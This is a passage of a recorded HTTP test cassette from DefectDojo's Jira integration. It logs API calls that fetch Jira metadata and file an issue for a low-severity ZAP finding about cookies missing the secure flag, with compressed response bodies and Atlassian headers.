9QPkQa7uuQvWCe9DSI5I1y3l3ztxAJ3k7a/Z8z0IyWouHUKsWYxv7DnbeXWY5dRp912TNFQIusfG + DEmwnlgvIV3o2xPSohBQ2FMgnrnkkuX98zs79/ylMPtDlzDp4eKz0IH15PQ5/W6s5EYeNPdfegGy + Lhtlds0YjSRr8ibUhv2dOmdBy9QGRI7cJgSqD994WzMoV78+XV5+/uKwUivdoUZFASrDkIQeq4Yr + QbksMa2Vttiv6BIwMB8QQL6et54W+PKoVyoO+zvfmSB5XV1QVVIpGeUXD9t6in9jszxugcdLKqFk + HMYxwQwja/sOBzgZDFCvxAEC19eL4fjM+rnCmwTh6U4fHV3ovgtu4oPz4xhd1Hpy+I3anes+1uva + CrrdUCqH97GDN3jOp1o8CooLDjFULN1PlLIbq52Bz7dM8fQPbF9/cJ1ETCVYHh2AiQW/aa2YqeNc + vUm2Jf/iSsEk3MR3ynDN0+FMq3sGT+2EGa5IskTXqGVOHCZ6y04lf1DDrim81OwFHwnmjir8rL8R + +edu5lpBHL8Jnc5h+uHrUxTejB85K3kCtcG55JSVjiFULMWsokX7IsvwFwAA//+0mVGPmzAMgP8K + 2juotFKl9m2qdtrDaTrd9obugatomx5HUOC07t8vCQ5xSAzcVt4gDtj5bGI73HMNNu0fRaG2594Q + ew9mHPqB/7MjFOVIG1x9qlM0T9M5a2XXFZDACn/WgukqMpCvetlSuWqlchVoCa17WFlfG6fy0nmr + /nNjTSIL0aK68LouRHJlIt+fL3Hjmm+S1YomlpLElASIPZSy7tVuCyCzwqWYpYqZVQNX2eFSHN9e + +a1oXmah5DXsog5MVARIiEldfpxZlXQxlyAm6qXN/v2jbNmxV+yRTmnSa5K0kgDp7PD96/Ovl0h9 + FxE/RQ9MyG1aZp9a9lHqYwg4YPKZu/tlUuP4hMwMn/SwgGHlZfD4OuxRtCmM+bC4tYm0X7SsOu+1 + DqPCqQKNz9bWZ/Lz4YK1tndDA+ChJztibPA3yH8F26sLrR7Zgs4QYIyOuw0Zd0oyiDvdZbMq6nrT + 8Xjz5i4WZ56msCBzb1E8bcLxlFfYjZOhpEKPVV1H7UXRBldgr0Vp65X+Flg/mvv7xw+oCq51sBuq + 0rE641iCh+lI2pKRpCQmu7bqzPmJyzxExM9gxt2jBny+1ZnW1YVvsx+6WQhHRt9IjAXHRK44lTz3 + c/GW5JuSfLXE4VurJUSy/mfv3ZZGcvZmLsQ7RbwHOucDJiqba/M7btSbY/1m7+NLR6CS50BaAlC7 + fwdHXnJlUoClO2EphPoUCKsKkes/3LnkdK8Yu7YbcPT5T0qe/2iJyYb6X0L0yKq3MDh3wlLg9AkQ + VhUCN77bh06A+t8yLjR09jNEsyOhKQlAe84pWiBZCtNOYdI6ZvIhokp2GmVx47HA5ho6O9T3yoSJ + dh5ofd1Bw0TawioZ2NE3f6vyE+ScDjTYCX8RRhHS45gUQuOfKzmP2BU7/wdkZSbzQ156CKZmaSZ/ + AQAA//8Cz3r4QyVpHCrE+Rm/sxGBgDQzBfEvkgDUa45paanJJcW0ncRKBFuSmkLhTBbcjQgfgovU + HGBBg/AjihDUl6CiKDVFAVyiE/AiAAAA//+0WslSwzAM/ZV+AD2EtheuhRM3liOnxMNkOkAIpd+P + F1mLI9Ekk5zaSE6l9+xY1ktnQoxR7R2vACdylFpisrKF7LfF90/H1iwZ8hySZXlgGE7D5QfKhZkH + U/6/Xej1SOeia8j+FQ128mOeJzV7igbfJulc+W5Cgz1HAoOXgGXQgS0IBWJpuWMamDlYWH38+vCN + t0tnNiiM3AQAjtxmg5i7mDCkCqN8Smg0Q8ayLraBgEpsAskAyB7jhQ1pzLyoW3bI4CYFzJ+UyZso + wYOtmpdixQmpY+1RmoclgeQMioI8SEybu2GRUm+lKWvcT923WQlMNEgboL8XRhv33DXJg2rIhv05 + v8M+gZoSePQAuCf37SvSOf9bSjuJyhFrnUijHC5iqVw0cC53fZ/GRgelVRzmfXm4tLXzhJ3uLt02 + LQccng+qtipemap49ACJD11bbyJdKoPcvRZ9URmnQCp3U9pFf7B3/te2UQoaEGaL25UpbkcPJ+w/ + ZVEOWIu0WyQNQmm06S8LrtCmS4MVE5hLdnYmb8HDeTva4oTwr8XaDllLkTTSZq01XZhgcmrJzN7k + LHg4Z7Yswd1rMbZHxuwD+pSWOz2ZPOdM1l623B5tfUoTQXWeGYGil6CWM3NOY0SNgyHXmNAgF7mI + uo12e/IP5uQHDyB7Dv912sDLHmX2hX+t6T8kPZRFoov4BkxXnps/AAAA///EW8FOwzAM/ZX9QKVe + uHBD7MgBIW6cui3AxLpWTTs+iP/hm2hdJ7ETe+s2ld2IbcX2q+OW54xHFdNUE3jnYYe+VL4IveoK + 5U4FNleBBQ0C+wi3sxf49hWQ5QYzQZsDtNwVWb0tm6reVN97GWC5s58HsTU7eosY4c2PwKty+6Dh + 8DZbq7QtbjAXvMDkc1dkdTt4Cctvzbpjg1oicE0AJYsncyAfM5P620S8drCzhIILZ7Qgbc7HqZeK + OrEATVQqphgviBwpFmcyV7nA1CJ2xta3Kxl9vpGr8w3QcJjtiReKZDYX3DDrkBwmsnEe3q/LWgae + kE9XQJ/s4sAnc5KibYv1Z8nu+1MRwv1AZWec14nfI8Sn/NUfU0EsxkA3BinJkJLjCdOiaTHv35/F + fw1ApLRTFkWOVz9M6twLNPwwDVTazgxH/vSJSm3nOlYwG1O9yopbHzAyarNdWRb0Ryd+7V6HXqAX + 1aUQOmcSBCmP5axJNQ0XO+GfQKwhv3aV4wV68FNOhBi98yZF30WTBmdLgV+1hSWDICLw0K8yJ7ou + fvFEB49SBnFLk2dAfouQWGPqqmkh/TExIsDEXoJEz+vSovLupKzi5+KNhYZcN1X/lw1PSNKERvwc + hHpSFz8sKRkSRtqAvVJvvirlCxrMbDl8iVY1vsuEjrthBnO1WSB8qSsJEIEWETumhUVGtsu2+9Z8 + wA8+9tlodN+rseWs3/22roXqJHCuksCgQVhfTVHKeKLmbCD/AAAA//8iMiDBQ79QO0BUNIjAXgvh + Dc4SoLZiq6JcXTADdf0LSAgjxHCPAhvgHAUGy0BDzL8oPTEvswocRTjGgdGV0CoMwSPBqJZhDT/0 + pZOI6Yh8JM24wxh5PgJJsy6SbgAAAAD//8RcwQ6CMAz9FY56MOEXjHow8eBFL8YDCYSYCCMi3Ph3 + 2WjXjbVqCMYbXYG+92pYV4YOTxRabhvHYtvYeEDoddU/O/TmBV5k1z27wO7N7fHl1AsRHU1rKlqY + rfR9NRXpZ3m91KmAtEi7dUdpgDlA0PybwspA0Lfh22Wx3ISOxSa08UAG9kWVmEUpI7/1za49qGja + zzbKcPC/hbjTos7K9vZQpbcY9MdAvp03iJjCyXiqUG5QTo6wdHWvIEJp4/9FB9lAZNtk4+XLfCxS + swEAY3I8ILRlgecSg6BECiuj35ZFFJAjwBVIXF2kCu9HRTZw2NgBmUKQBjjlYx4wGkcAfPWqSnIv + FXgRkWjVM6M8oAUEzmDK8KdnYAjFoUcQFvUwQJj1R7Z3Re+byAbcB5VH+svgt9CnKs9BHs8VhMiS + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - d43bfc5375e23b12 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:32 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 7d4a3512-9ac5-4a3c-9134-84d62ed5dd14 + x-envoy-upstream-service-time: + - '68' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - a330c989a489811d + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:33 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - dd57f12d-1194-4d92-9c92-f4cfcff6b9e9 + x-envoy-upstream-service-time: + - '67' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Jira Api Test 3", + "description": "\n\n\n\n\n\n*Title*: [Jira Api Test 3|http://localhost:8080/finding/383]\n\n*Defect + Dojo link:* http://localhost:8080/finding/383\n\n*Severity:* Low \n\n*CWE:* + [CWE-614|https://cwe.mitre.org/data/definitions/614.html]\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [1st Quarter Engagement|http://localhost:8080/engagement/1] + / [ZAP Scan|http://localhost:8080/test/110]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n*Mitigation*:\nWhenever a cookie contains sensitive + information or is a session token, then it should always be passed using an + encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n*Defect + Dojo ID:* 383\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1690' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10607","key":"NTEST-455","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10607"}' + headers: + ATL-TraceId: + - ea7ddee25ffd85d7 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:33 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 2f423c94-163a-4d5c-9783-0f1c1710ab9e + x-envoy-upstream-service-time: + - '433' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-455 + response: + body: + string: !!binary | + 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 + AA== + headers: + ATL-TraceId: + - 66dc0b4f7f3fb566 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:33 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d9ae875d-08ca-4914-819f-bbab48686027 + x-envoy-upstream-service-time: + - '123' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10607 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 51e9d35920f6258d + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:34 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 77ef2e14-a5e7-4b7a-9537-f4719628b200 + x-envoy-upstream-service-time: + - '170' + status: + code: 200 + message: OK +- request: + body: '{"issueKeys": ["10607"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/333/add + response: + body: + string: '{"errorMessages":["Issue does not exist or you do not have permission + to see it."],"errors":{}}' + headers: + ATL-TraceId: + - 45dc0307e955b175 + Connection: + - close + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:44:34 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - 